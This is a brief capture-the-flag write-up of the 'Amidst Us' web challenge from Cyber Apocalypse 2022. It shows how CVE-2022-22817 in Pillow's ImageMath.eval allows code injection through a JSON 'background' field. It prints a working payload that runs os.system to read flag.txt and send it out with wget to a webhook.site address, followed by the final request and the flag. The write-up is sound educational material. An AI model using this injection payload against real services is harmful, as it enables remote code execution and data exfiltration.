Post

Cyber Apocalypse 2022 - Web - Amidst Us

Posted Updated
By Cody Dietz
views 1 min read

Amidst Us

amidst_us_1

Loading up the page we see a weird spotlight page ala Among Us, and we have the ability to upload images to replace our two sus peeps

(Apologies, didn’t get a better pic but there is something there!)

1
2
3
4
5
6
7
8
9
10

POST /api/alphafy HTTP/1.1

{ 
    "image":"iVBORw...ElFTkSuQmCC",
    "background":[ 
        255, 
        255, 
        255 
    ] 
}

So it sends out an encoded image and background colors. Looking at the source code, we see that it uses ImageMath.eval which has a known CVE

1
2
3
4
5
6
7
8
9

new_bands = [
    ImageMath.eval(
        'convert((image - color) / alpha + color, "L")',
        image=img_bands[i],
        color=color[i],
        alpha=alpha
    )
    for i in range(3)
]

So if we instead make use of the ImageMath.eval working on the color portions we can try to see if we can make use of CVE-2022-22817 using the following payload in any of the background parameters to cat the file and wget it back to a webhook as a get parameter

1

"exec('import os;os.system(\"flag=$(cat ../flag.txt);wget https://webhook.site/{your_webhook_uuid}?flag=${flag}\")')"

Final payload

1
2
3
4
5
6
7
8
9
10

POST /api/alphafy HTTP/1.1

{ 
    "image":"iVBORw...ElFTkSuQmCC",
    "background":[ 
        "exec('import os;os.system(\"flag=$(cat ../flag.txt);wget https://webhook.site/{your_webhook_uuid}?flag=${flag}\")')", 
        255, 
        255 
    ] 
}

Flag: HTB{i_slept_my_way_to_rce}

CTF, Web
Cyber Apocalypse 2022 Writeups Web
This post is licensed under CC BY 4.0 by the author.